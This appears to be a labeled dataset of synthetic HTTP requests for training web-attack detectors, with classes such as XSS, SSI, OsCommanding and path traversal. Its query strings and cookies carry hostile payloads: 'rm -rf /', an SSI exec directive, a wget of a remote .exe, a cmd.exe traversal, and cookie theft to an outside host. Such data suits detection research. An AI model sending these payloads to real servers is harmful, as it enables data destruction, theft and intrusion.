From: rlNe@ecetad6.fr
If-Modified-Since: Sun, 04 Jul 04 04:06:51 UTC
If-Unmodified-Since: Sun, 11 Sep 05 03:38:26 GMT
If-Match: *
If-None-Match: "DWBD9.TJ_LtW3kMqM9"
If-Range: Sat, 24 Sep 05 05:05:05 CET
Max-Forwards: 7547
MIME-Version: 7.7
Pragma: ehUEzeMe=od5rbea
Proxy-Authorization: Basic czZVbmRodDphdW5zdG9u
Authorization: te0zsl ht56=rbiy4mx
Range: -887125,6715-3229
Referer: http://www.ASp9c.org/meqgn/meysmh.msf
TE: trailers,deflate;q=0.9,trailers
Trailer: Date
User-Agent: t2islotse/9.1.2.2
UA-CPU: 68000
UA-Disp: 746,0945,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0710x100
Via: 0.3 www.cnOsnEfk.jpeg, 8.6 www.nhgaJ.jpg
Transfer-Encoding: Ortu; dz2you=td8thhn
Upgrade: 1eEw/6.0
Warning: 204 41.21.10.144 "pfgeDet" 
X-Forwarded-For: 195.31.132.94
X-Serial-Number: 08031328367563648957
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47740
Start - Id: 49892
class: XPathInjection
GET /y-tt_1oQ/m.ZIp4/y.mL4S__l7r0GZ3.Lfw/s40jo1/1j/isXrbNUt8/oN@6BU/Kehsni/eiarEr.jsp?DOXFyp=577484821&u.GwnfD1Z=yEo%27++or+++++e%2Fefhs%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D8%5D+++++or+++++%27sn2ihrl%27%3D++%27 HTTP/1.1
Host: www.s0edwouL.de:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1257
Accept-Encoding: 
Accept-Language: usbneg-el;q=0.9
Cache-Control: only-if-cached
Client-ip: 219.53.62.33
Cookie: waLnd=wLt;li7bnyfl=5035310519;jrmem6dgneer=unrds;eMtF=4iSouemhHp7rmTukns;dgn5i_JKeBl=admini8c 2emw|eumm0al?E0d
Cookie2: $Version="183"
Date: Sat, 04 Nov 06 24:35:44 UTC
ETag: W/"79-wqobJXvLTgCDO1"
Expect: 3ms1era
From: ldlcym@E8Sinechia.ch
If-Modified-Since: Wed, 04 Mar 09 04:33:06 CET
If-Unmodified-Since: Fri, 05 Aug 05 24:01:21 UTC
If-Match: *
If-None-Match: "AlcXNctY-E.3B4V_iDLw"
If-Range: "B1Tnuf3c.TEiAxhEq41"
Max-Forwards: 772
MIME-Version: 6.4
Pragma: hetuH='8erunlvr'
Proxy-Authorization: oAo4 hnaarqm=nniOb
Authorization: Digest username="jerciEn"
Range: 67-9392,-55
Referer: /esotpdBs/paea/mseyl7e8/rotiinCe/dsaamE.php
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/8.8 (Windows; U; Win 9x 9.0; UE-na; rv:1.2.4) Gecko/49557122
UA-CPU: PowerPC
UA-Disp: 2831,824,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 9591x1965
Via: 7.6 www.Adssrrw.js, 2.6 34.199.106.40
Transfer-Encoding: gzip
Upgrade: Ez33h8/8.9, Odopt/6.7, aym/2.3, ttuho/1.9
Warning: 883 www.oeedEt.gif "90sw81n3tnalV" 
X-Forwarded-For: 88.207.99.219
X-Serial-Number: 87544886060
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49892
Start - Id: 39909
class: SSI
POST /sMpQ/xGepcydsom37u/csIuh.css? HTTP/1.0
Content-Length: 103
Content-Language: eatt
Content-Encoding: compress
Content-Location: /hinu1i.asmx
Content-MD5: cmZlamhMdWllM3VtbGxuYw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 18 Jan 08 15:13:36 UTC
Last-Modified: Tue, 19 Jul 05 03:53:07 UTC
Host: 171.117.141.198
Connection: 0uAhpa
Accept: */*
Accept-Charset: iso-8859-5, iso-8859-2, iso-8859-1, koi8
Accept-Encoding: *;q=0.7
Accept-Language: snijt-anb;q=0.1, aisles-eiuarsm;q=0.3, mtooy46-4et, 7cm0esud-ki, g-TlmNl;q=0.6
Cache-Control: min-fresh=48206
Client-ip: 239.36.31.16
Cookie: b1p=bo
Cookie2: $Version="47"
Date: Mon, 07 May 07 19:11:38 CET
ETag: W/"KujfBaJYEnNh-svZHP"
Expect: cs2a2eya
From: etiwhOvt@03yWr.net
If-Modified-Since: Sun, 07 Aug 05 23:25:03 CET
If-Unmodified-Since: Sun, 12 Mar 06 06:26:43 UTC
If-Match: "vJjBK.Qx7jaij4qsS"
If-None-Match: *
If-Range: "Xedi0o0y5rPO_S_4"
Max-Forwards: 984
Pragma: eolsfe='o8Ed'
Proxy-Authorization: NTLM aW9lbWNlZW5zcWVvaWcwbHExbWd5NXNvaXFyZWN5bjRhaQ==
Authorization: Digest cnonce="DmWeetx"
Referer: /ssqaR/cer0nep/pzXToe/t0auet4m/oeMe.gz
TE: trailers,deflate;q=0.8,trailers
Trailer: Trailer
User-Agent: qstdOcT0hembtfq4
Via: HTTP/1.2 186.93.116.28, HTTP/5.8 www.vjde.jpeg
Transfer-Encoding: deflate
Warning: 151 www.ttt8oAn.jpg "coIndbni" 
X-Serial-Number: 430786884231
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

ui5tAti5ola=<!--    #exec   cmd="/bin/ls   -l   /home/w5efTe/tsb3t8avoi"    -->

End - Id: 39909
Start - Id: 43402
class: OsCommanding
GET /iLOdtserysihasgdhv/eSh5tbM64B9/addEtnttrcdarvla7/ZWKallCY.ABidP.png?i9Lsjttt=hamnodehtacces&ltnD=%3Enc%5Dn&sthkeb=n&sCGA@PEJd98=22472783&ezS=g7lAn4x&rxide9ces=4&nctss0h=rdcedotcmes&980J-oc=%60++rm+++-rf++++%2F+++++%60 HTTP/1.0
Host: www.y3as.uk:83223
Connection: close
Accept: image/gif, audio/x-wav;q=0.8
Accept-Charset: x-mac-korean, windows-1257, iso-8859-4, windows-1258;q=0.6, windows-1252
Accept-Encoding: deflate, deflate;q=0.9
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 19.131.79.59
Cookie: cazpdrd=o7g5
Cookie2: $Version="5"
Date: Mon, 30 Jan 06 05:50:50 GMT
ETag: W/"FBRRehdBHitCX2E"
Expect: n0nee
From: su7olsim@shSdnne.cz
If-Modified-Since: Fri, 22 Sep 06 07:26:57 UTC
If-Unmodified-Since: Sun, 16 Apr 06 09:21:15 UTC
If-Match: "d30xvdIrjFZxaS-v2WxE"
If-None-Match: "g@kDwcj59B4mYBB"
If-Range: Sun, 12 Sep 04 22:37:09 GMT
Max-Forwards: 3545
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest uri=http://mertS.cz/iitepr/E6ydsge.msf
Range: -4315,8885-439,063-
Referer: http://www.p2ng.ch/doxsfl9.tar
TE: chunked;q=0.3
Trailer: If-Range
User-Agent: ISR8ew9a
UA-CPU: StrongARM
UA-Disp: 3207,5717,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 9788x122
Via: t8h/0.5 180.32.184.80:2246, 4.3 250.251.227.123, xedy/3.9 www.5axidlj.css
Transfer-Encoding: identity
Upgrade: zos/3.8, LrxEi/5.1
Warning: 667 www.eekudeq.shtml "ep6tpihnare" 
X-Forwarded-For: 207.33.218.68
X-Serial-Number: 64752723331418038
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43402
Start - Id: 45983
class: PathTransversal
PUT /bad3oGn/orN-3Oq/d.C.cZxv/6eSdivh55.W1m_W9/k1/o54sBlogd/h3uXTHyUe-O@BBRW3IX/qSx/rifnjAMpeeisrrwg/os7V4EB-oFEie1@uSLB/eijnlcctintvs/f3fK3Sv.y77enShyDTt.exe? HTTP/1.1
Content-Length: 215
Content-Language: tech3,76doyD3v,rOw
Content-Encoding: compress
Content-Location: /Xiig.dll
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 29 May 08 11:10:26 CET
Host: www.oys45nei.it:3
Connection: keep-alive
Accept: video/*;q=0.9, audio/basic, image/*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.4
Accept-Language: e:\windows\boot.ini
Cache-Control: no-transform
Cookie: hsTi=cmdces7a~Telf+bt;se2au4o8v=ta
Cookie2: $Version="181"
Date: Wed, 21 Apr 10 03:41:34 CET
ETag: "iL.lhMF7FSpD_jLo"
If-Modified-Since: Wed, 28 Mar 07 11:33:25 CET
If-Unmodified-Since: Fri, 13 Aug 04 10:34:29 UTC
If-Match: *
If-Range: Tue, 25 Mar 08 16:17:25 GMT
Authorization: Digest nc=aa17BA4c
Referer: http://twdgs.biz/npor1rsa/hstou/2sal/eslK.asp
User-Agent: iWRjMb http://www.erRsent.be
X-Serial-Number: 9739986

iQhsoorhnkh= rle&GKgroup bySpositionOTTxterm=qdh55arEsRsc&sfipot=2&WdBErjMK5Z6=opYK82&deteLwavO=accept(&EtstaceasRe7vin=Geeq8n&neoe1l6ses=mTb&AdmQAOR.=d&fwsnim=thaiilv&osr=richild&sqvKLdi=etcd%&CnLhomeFg9=e9kA.v

End - Id: 45983
Start - Id: 46281
class: PathTransversal
GET /6hLAwCyx0UOQn/edc2x9EEq-t/RPbgsound/aWl/wgVt25/passthruqHselectniF6y.shtml?sne1=nry&a74rhygm46odru=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion&inW43Y8wp-y3Nw=rFkhf_&a6u9tlfdi1sin=3fYbO7wwMIFp&otce1=rrA%2Ftpm%5Cte&sho=oAbt4%40q2egr3&7hegsfwesOt=window.open%2FisaucV3+oimb&ash9neh=407&IB1z=2unt HTTP/1.0
Host: www.si3soa.net:853
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: max-stale=9513
Client-ip: 131.126.28.0
Cookie: yhh3aUab7et4eo=@updateis1z;eahcr5muhlmi=233
Cookie2: $Version="92"
Date: Tue, 01 Apr 08 02:16:28 GMT
ETag: "qTKDkaKodzPSVS8-"
Expect: 100-continue
From: o8nret@EbsFqo4s.st
If-Modified-Since: Thu, 25 Mar 10 14:10:39 CET
If-Unmodified-Since: Thu, 18 Mar 10 24:25:32 UTC
If-Match: "brpk6iGhZ@Eq7W6cn"
If-None-Match: "ADv5vXCPlEfadxCR"
If-Range: Sat, 04 Apr 09 08:18:37 UTC
Max-Forwards: 1953
MIME-Version: 8.9
Pragma: un=MeaeHe1i
Proxy-Authorization: NTLM d29vc2FoY21qbE9uYW90ZW5jc2hzNnRpZWxvVGxPbjRlYWd0cjRl
Authorization: Basic ZXRyOUk6N2xtc2g=
Range: -99,17-4389
Referer: http://www.oeE5q.st/sesi/dieio/tnhEe4.css
TE: chunked,trailers,deflate
Trailer: If-Unmodified-Since
User-Agent: bzxs4los (itMhYpd8; ot7yjYN)
UA-CPU: PowerPC
UA-Disp: 542,0115,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1380x824
Via: 0.0 188.34.118.183
Transfer-Encoding: deflate
Upgrade: Su9qj/8.6, baec/7.2
Warning: 013 22.194.211.11 "8iCne9m5iQhhsaHen19e" 
X-Forwarded-For: 136.2.161.83
X-Serial-Number: 1060683
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46281
Start - Id: 47310
class: XSS
GET /sz3._EV9Tmg/sscriptvbscript71TkLv/iLa5war/tpeKMc/a_7/evsuisdeCase.cfm?ehtey=0430088&ueslkN=1656288&adEeicte=32&3nJEO1Anc=tform2%3BeoP+Cs&V_xstyleX=+r&eaomn=dSe%3Fuunion4h6&pd9ebmee=%3Cxml++++id++%3D%22++++X+%22+++%3E%3Ca+++%3E%3Cb+%3E%26lt%3Bscript++%3E%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.enveet.com%2Fcgi-bin%2Flian.cgi%27%2Bdocument.cookie%29%3B%5D%26lt%3B%2Fscript%3E%3B%3C%2Fb+++%3E%3C%2Fa+%3E%3C%2Fxml+++%3E&srOtVwdAiurro7=8iaa&yycdsimdfru=oDo8CBPeMnN&deertibNknmea=dleu%3B HTTP/1.1
Host: www.antrAn.it
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: iso-8859-9;q=0.9, iso-2022-jp;q=0.9
Accept-Encoding: *;q=0.6
Accept-Language: ttHbm-u;q=0.7, lWggx-rh;q=0.1, t-r0ni;q=0.6, esntao-cc8, 2lcnel-ldae;q=0.0
Cache-Control: no-store
Client-ip: 34.95.18.244
Cookie: Sst=fsgJnnad&erMbp;xeeomd=ujrEmpbt;tsecnfhrr=o@ira;cmd7jKJVZ9TO=iy'vbscripthtpassrvobject>FR smtawc
Cookie2: $Version="659"
Date: Wed, 06 May 09 09:01:41 CET
ETag: W/"kmh.JRxb6nN3qMqK1"
Expect: 100-continue
From: 7enano@rnreTe6ep.de
If-Modified-Since: Fri, 19 Feb 10 21:43:02 GMT
If-Unmodified-Since: Tue, 07 Jul 09 16:28:04 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 02 Dec 08 22:15:20 CET
Max-Forwards: 48
MIME-Version: 0.1
Pragma: nN=9da
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: NTLM aDRpeWV1UGFzQmpoZTYxaWd5N2Vub2d3dXR0cm5TZWUyQXQ=
Range: 498-
Referer: /Hoo3nAar/veiltg/e9ouoeso/e5y7aan.jsp
TE: deflate,trailers,deflate
Trailer: Transfer-Encoding
User-Agent: inkFXm1 http://www.e6rsean.com
UA-CPU: Sparc
UA-Disp: 8442,560,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5306x1733
Via: HTTP/1.2 202.251.15.163, 5.8 www.e8haimhr.htm
Transfer-Encoding: lgxk
Upgrade: ddnzgk/3.0, pnnt/9.2, eehf/9.2
Warning: 318 www.lawraii.gif:81 "spet7rfthtnscentm3" "Thu, 05 Aug 04 21:32:03 CET"
X-Forwarded-For: 46.124.140.98
X-Serial-Number: 126620
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47310
Start - Id: 38688
class: LdapInjection
GET /VID/oil/mi/wgA_L3lEsjSah6w_u.dll?Osock_stream.yp=906&Eo0=oU7DVPXnlycu&mwosnaA5e3t7od=hau%29%28%26%28objectClass++++%3D++++as*%29&midTdhot=lowUbOM0&iyngff0ajwa2le=rioneWdmouhaOny&rtolt=Diezame2nee&8IV8ZBcmdI=loepassthrutitel1naso&ai=eybst6ieenok&ro6Ui=netcathhssamWir%3BeAmy&ytx1nasDstsIH8=nlnfdreccof HTTP/1.1
Host: 7.94.14.141
Connection: close
Accept: video/mpeg;q=0.0, text/html;q=0.2, audio/basic
Accept-Charset: x-mac-greek;q=0.3
Accept-Encoding: identity;q=0.1
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 19.47.61.99
Cookie: 8sa2oaaasT9xcwi=htpofec8nc(dsjl|io;m4nScsoe9lddnRw=50
Cookie2: $Version="63"
Date: Tue, 10 Nov 09 01:11:10 GMT
ETag: "EvxKQQHQRlpZyyner"
Expect: 100-continue
From: nTromT8u@pzcel.it
If-Modified-Since: Wed, 07 Nov 07 01:16:28 UTC
If-Unmodified-Since: Wed, 11 Apr 07 10:58:54 UTC
If-Match: "3y-ZgHOmC5SbjCj"
If-None-Match: "82WF.AE6RI@rmqrM99"
If-Range: *
Max-Forwards: 6840
MIME-Version: 5.4
Pragma: nomesgt='nsbha5oe'
Proxy-Authorization: NTLM NW9uckk4bWZtaXRyMGFvemFoaXJZZWNoZW5jaWV5Zmxpc2EzYXNOZWVzNXM=
Authorization: Ns5wt sihbnas=Atnr6O
Range: 32-1,3888-481886
Referer: http://nsbd7ee.com/edwll/bntaq9sn/8Bsh/sa0a.exe
TE: deflate;q=0.7,trailers
Trailer: Cache-Control
User-Agent: Mozilla/1.1 (compatible; dttHIxhlmn; Windows NT; eceebne; tio5fewTt; ooooeyswtt)
UA-Disp: 0550,3953,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 908x4326
Via: 9.9 www.emejsr.gif
Transfer-Encoding: gzip
Upgrade: s1i4r/2.1, mrhpoe/7.3, dua/2.5, lrn/6.4
Warning: 502 www.ssta3set.jpeg "SptsmeMga8ettons" "Wed, 02 Apr 08 05:31:51 CET"
X-Forwarded-For: 249.144.3.114
X-Serial-Number: 7677444389981478018
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38688
Start - Id: 40374
class: SSI
GET /wnoe/iueSK/BN4sih3opp/Mieutnra/eawh/c@n/@8WM.png? HTTP/1.1
Host: www.qwnU.ch
Connection: close
Accept: */*;q=0.5
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.7
Cache-Control: urd=Ac
Client-ip: 154.148.102.124
Cookie: aia2mc5i=tCsrlxAhe;hunsunnutovi=962248;iaNsoysi=5wamiray;ldjeeOxqesd=<!-- #include   virtual="c:\winnt\system.ini"  -->
Date: Thu, 21 Oct 04 22:40:03 CET
ETag: W/"dmD0AWUHHrhux.bXHm"
If-Match: "z2UQKYQSbLbWRhDVW"
If-None-Match: *
If-Range: Tue, 03 Jan 06 13:53:35 CET
Max-Forwards: 57
Pragma: tlmatl=lTte
Authorization: tidal 2rne8esa=f3qr
Referer: /eWoey9/natosi/ue5I/bs2Rai.bin
TE: chunked,deflate;q=0.9,trailers
User-Agent: Mozilla/5.9 (Machintosh; U; Mac OS X 6.8; Gm-1n; rv:8.1.4) Gecko/10793114
Via: 1.8 28.46.118.94, HTTP/6.8 56.79.21.178:2222
Transfer-Encoding: gzip
X-Serial-Number: 37172420650440

null

End - Id: 40374
Start - Id: 46431
class: PathTransversal
GET /al4lAotoeidudrs/90koonuzy9aotetu/uyGtmsxoraje/mk_5/ys9o0/eetrCtreedreeev4ei/q2hrslos.html?eo=aesegTcnmUutnTienu&oslndcbpsai=psixmtsmetadt&lihnorctsL=110&jVx8SY@h@m3=..%2F..%2F..%2F..%2Fvar%2Flog%2Faccess_log%2500.html&oo0noi=dwe&6rthgyetTrss=15&Spr5ohatUq=002856&TyblsIz=2888&jcAd@=oYpw6&hdObat9=+%28+&Tjrwnge=a&sErtdkigtra=sit5aesgoeH6&-N-F=152404072&c3ioeuih=enfE5O2t%7Cscriptnselectsli HTTP/1.0
Host: www.sStyhtqsbc.fr:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: E3l-Oo4zt;q=0.2, mn-h;q=0.6
Cache-Control: no-cache
Client-ip: 13.160.243.201
Cookie2: $Version="84"
Date: Sun, 28 Mar 04 11:01:53 GMT
ETag: "NKqtyz9ILmI6TEVmkg"
If-Modified-Since: Wed, 30 Dec 09 02:30:08 GMT
If-Unmodified-Since: Wed, 14 Feb 07 11:12:33 CET
If-Match: *
If-Range: *
Max-Forwards: 141
MIME-Version: 9.4
Pragma: e=sl
Proxy-Authorization: E0mqn 5bih=ea6O4
Referer: /fqtd/lsrte.msf
TE: trailers,trailers,deflate;q=0.9
User-Agent: AedofCoca/9.2
UA-CPU: MIPS
Via: 4.0 www.Omnpl.tiff, HTTP/3.6 www.tasl.gif
Transfer-Encoding: compress
X-Forwarded-For: 3.77.163.149

null

End - Id: 46431
Start - Id: 46196
class: PathTransversal
GET /saEswzuBT/_imgLs3kUGsFovfrh/toQjta/ez7jzq7XQpu313F-JUPT/e1fV2arundBwZh3B9Whh/dro3sutsx/uwdgswOhlr3Htxrdrdfy/teStLO38UlvZqC2EzlIo/oC/o3amsjNtndhfwdad/uxqe1ntJdrAsebhS/nagF.aspx?6ynhocgedee9c=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion&86a0o8dra=scriptsciddah HTTP/1.1
Host: www.sea4sEh.de
Connection: keep-alive
Accept: text/html
Accept-Charset: iso-8859-5, iso-8859-6, x-mac-greek, windows-1251;q=0.5, koi8-r;q=0.5
Accept-Encoding: deflate, compress;q=0.4, gzip;q=0.7
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 250.173.5.46
Cookie: h00iclCIy=l7esnpziqr;nuEen5=14658;knghtq=dnmetaIdsk=qecapi0;YRlR=wTm;rfenpne=1;n0hlramrrn=qf@fkPp5Rp5
Cookie2: $Version="43"
Date: Tue, 09 Jan 07 11:40:36 GMT
ETag: W/"nQ.rQWXAUkCMPTh0G"
Expect: 100-continue
From: sloo@sd406oko.ch
If-Modified-Since: Thu, 31 Jul 08 08:55:47 GMT
If-Unmodified-Since: Fri, 20 Feb 09 21:16:22 UTC
If-Match: "GT6rFwb8xEhzB6t"
If-None-Match: "__ytYBxTQUR.s9oq"
If-Range: Sun, 06 Nov 05 19:12:52 GMT
Max-Forwards: 1455
MIME-Version: 1.0
Pragma: jba='f'
Proxy-Authorization: NTLM dXNoNGdodHRybzRucGtlTHJpbzBmaTVGaWhzYWhyaWFlYXE=
Authorization: NTLM bHZzaWF0dEIwbmtvZWk2c25jMHNuZHRtOG14dWZodXRua29vM3Rp
Range: 3-60707,6378-,-00133
Referer: http://www.j7cE.fr/ehREnAo/Nsye/diiNynoN.swf
TE: trailers,trailers,chunked;q=0.8
Trailer: Accept
User-Agent: Mozilla/4.3 (Machintosh; U; Mac OS X 1.4; 6H-dt; rv:4.6.0) Gecko/82843697
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 939x7286
Via: FTP/0.8 214.77.125.123:174, 6.5 www.hehdf.tiff:6177
Transfer-Encoding: compress
Upgrade: eesinn/1.0, mc0b/6.6, eaa9an/7.8, olCrho/0.4, dhbfna/5.5
Warning: 034 www.nkeyuho.html "s4csmi7rg" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 4158799
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 46196
Start - Id: 43785
class: OsCommanding
GET /msadc/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.gbfoe.be
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8, windows-1250;q=0.8, hz-gb-2312;q=0.2, windows-1250
Accept-Encoding: *
Accept-Language: oultji-tna8, Mmhnet-a;q=0.1, non-aee3nray
Cache-Control: max-stale
Client-ip: 15.226.120.35
Cookie: bgin7im=asl"apacsdrop"atO/ 
Cookie2: $Version="222"
Date: Tue, 10 Jun 08 08:08:37 CET
ETag: W/"AMC5ZOlrnU7y1Mew"
Expect: 100-continue
From: qto7read@r8owxth.de
If-Modified-Since: Sun, 30 Mar 08 11:56:33 UTC
If-Unmodified-Since: Mon, 25 May 09 15:09:59 CET
If-Match: ".SZXlk0tUSsOQGtXMRc"
If-None-Match: *
If-Range: "wvEYw8..3_uUFxKgPMQ"
Max-Forwards: 6
MIME-Version: 5.3
Pragma: 8j='g'
Proxy-Authorization: NTLM ZmxlYXN1dXJhYU12b25ob25mQm5JYWVzbHR0bmlhYXNoNnVyZw==
Authorization: pTeest obeyj=ge1a
Range: 10571-03
Referer: http://www.tecs.gov/Pshm3ac/9eauo/osri.php3
TE: trailers,chunked;q=0.2,gzip
Trailer: From
User-Agent: Mozilla/0.9 (compatible; Konqueror/0.2; Mac OS X; i4rUM94; rjeaynce)
UA-CPU: Sparc
UA-Disp: 911,7505,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 154x454
Via: HTTP/2.5 181.197.68.245, FTP/3.5 www.edewa.css
Transfer-Encoding: identity
Upgrade: tEYegn/9.0, l5aur/2.0, tbef/0.2, 8mru/4.2, Nsq/6.6
Warning: 848 www.ellxsil2.jpg "n5rnlcviw" "Wed, 23 Mar 05 14:33:15 GMT"
X-Forwarded-For: 144.180.167.11
X-Serial-Number: 11781143207905764900
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43785
Start - Id: 36251
class: PathTransversal
GET /w8J@nHcGMGYz/GLG2x01RBnT/aDdCy@oAHtMhKKGrc/dmw_4tzl@2-vduaktC.jpeg?qnross=9686&ixnTig2vfm=oyne&QSIW=5074285&ei=aioTtof&peuworoneT=urlegur&9taaapczHaoy=lhp1A&r7aHzirRoE=944531&asretsn5Stiyr=a%405DQobU&iyhrbf=E0E1eeh+cybdhi&8jdaqtiepk=o%2Bteni+S%3BAlibdocument%3Abb&sras6p=9411090&1eftc=5 HTTP/1.1
Host: www.liyti8.fr
Connection: keep-alive
Accept-Charset: x-mac-greek;q=0.6, windows-1258, cp-950, iso-8859-5
Accept-Encoding: *;q=0.4
Accept-Language: nnestsr-5uh1;q=0.5, aet6-ai;q=0.6
Cookie: -YIM=../../../../../../proc/version
Date: Wed, 15 Aug 07 22:47:18 GMT
From: ay2otns@orshrnoo.com
If-Unmodified-Since: Sat, 31 May 08 10:51:36 UTC
If-Match: "G1rSWeFo0bXsnlS0@cFr"
If-Range: Fri, 17 Mar 06 08:20:37 CET
Max-Forwards: 5545
Authorization: Basic aHdzc29haTp3Y2s3Zw==
Referer: /22ebgA/9d04t/Tnteza6.jsp
User-Agent: nonjeO/9.3.0.9.8
Upgrade: rub/7.9, iNntwn/5.3, ooiyrs/6.5, tstroi/4.2, urt4l/4.2

null

End - Id: 36251
Start - Id: 43596
class: OsCommanding
GET /4Ehavingl@pGSEIm8/JGMtVXQrmIXs/EygnetcatGwU_Dboot.iniUnhome/eiF.asmx?52ma=where&Eesbs7ensst=9209&5EIcoae=%3Asas&Oyc=48578509&TwajsrongGS=%5Cn+wget+http%3A%2F%2F93.69.160.233%3A1004%2Fnftp.exe HTTP/1.0
Host: 61.136.105.127
Connection: shstheD
Accept: image/*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.2
Accept-Language: rreds7-M;q=0.5, 2oaii-r4vfsni, tdi9-thssKtas, h-e4;q=0.6
Cache-Control: min-fresh=92559
Client-ip: 229.233.28.110
Cookie: mt3eai=5052731;S28F8=ehatAesc5d1ew
Cookie2: $Version="7"
Date: Mon, 09 Aug 04 24:10:11 CET
ETag: "4k2b-aFzaYNwu5THDb"
Expect: gtmnl0e=x4oheja
From: uiaeltm@8ehtblt.biz
If-Modified-Since: Mon, 22 May 06 14:29:25 CET
If-Unmodified-Since: Mon, 15 Mar 04 19:42:07 CET
If-Match: *
If-None-Match: "PrDDuqcxo03A.BA0"
If-Range: Sat, 07 May 05 24:59:07 CET
Max-Forwards: 3
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: gJons gtoaie=6vpernh8
Authorization: NTLM MmRpa29lbHJldUhzYW95aHJvbW5lcXJudGF4SWRlYWtpaWVPSGhsdXI2
Range: -49,-4,23-3
Referer: /tleta/nioirx.shtml
TE: trailers,trailers
Trailer: Range
User-Agent: ocuLot (tRkoLo-Ie1; 1Kg426)
UA-CPU: PowerPC
UA-Disp: 084,5683,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 279x772
Via: HTTP/4.5 www.TssWz.tiff:645, HTTP/3.6 25.172.71.120, 8.7 4.202.76.11
Transfer-Encoding: gzip
Upgrade: wyme/7.1
Warning: 888 www.nazwap.css "n5ewrsqhebhsof" "Mon, 16 Jun 08 15:04:37 CET"
X-Forwarded-For: 25.170.198.152
X-Serial-Number: 597498125488079
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 43596
Start - Id: 48604
class: XPathInjection
PUT /hDhYGMVD7NDOqyO1E/5gaNg.jpg? HTTP/1.0
Content-Length: 304
Content-Language: Reda,a
Content-Encoding: compress
Content-Location: /so95iil.mpeg
Content-MD5: ZWlycHdnM2FIdG5hNHN0MQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 09 Aug 09 19:49:33 UTC
Last-Modified: Thu, 26 Feb 09 21:59:10 CET
Host: 77.33.208.142
Connection: Hm2b
Accept: audio/*;q=0.9, image/gif;q=0.0
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 58.151.109.14
Cookie: 5Xenbieuni=lscripts s;9n=a;1b8RuvhrsBM=i e+a80ahNahlt;a1lBegbmg=is  
Cookie2: $Version="7"
Date: Fri, 23 Mar 07 17:56:35 UTC
ETag: W/"8nwUpGX1@vrk.uB0bqTM"
Expect: 100-continue
From: aUfef@ct1nr.cz
If-Modified-Since: Mon, 03 Jan 05 21:47:28 CET
If-Unmodified-Since: Sat, 26 Apr 08 09:27:27 CET
If-Match: "Mm83On1z6kdrQw3g0D"
If-None-Match: "iWTwWoQsVMvsBqR3"
If-Range: "eK7x7COBp1sq9sCZ"
Max-Forwards: 51
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Basic TWx1Zzpic3JvZWg=
Authorization: ndnhp laeasbte=tcyn
Range: 3-574
Referer: /utrn/7oeses/i5h0i/9oEih/wrldbwma.msf
TE: deflate;q=0.4
Trailer: If-Range
User-Agent: Mozilla/0.1 (compatible; MSIE 0.5; Unix; itnN0kwh; neOmy)
UA-CPU: Sparc
UA-Disp: 5404,3137,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 853x5228
Via: dmnaa/6.2 www.eaauhil.html, mny/8.0 241.58.186.24
Transfer-Encoding: tFultt
Upgrade: 98segm/6.0, emke/7.4, V6urw/1.6, y7u/6.3, erasgo/2.6
Warning: 912 63.37.169.211 "zae8nine1efbsarunme" "Fri, 13 Jun 08 08:02:48 CET"
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 9078017597959591
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

